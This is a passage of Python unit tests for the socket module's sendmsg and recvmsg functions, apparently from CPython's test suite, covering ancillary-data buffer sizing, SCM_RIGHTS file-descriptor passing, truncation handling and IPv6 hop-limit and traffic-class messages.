(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
        # Receive into multiple buffers (scatter read).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
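        # For instance, testCmsgTruncLen1 below sends two FDs but
        # receives into CMSG_LEN(SIZEOF_INT) bytes of ancillary space,
        # so at most one complete descriptor (maxdata=SIZEOF_INT) can
        # come back.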
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
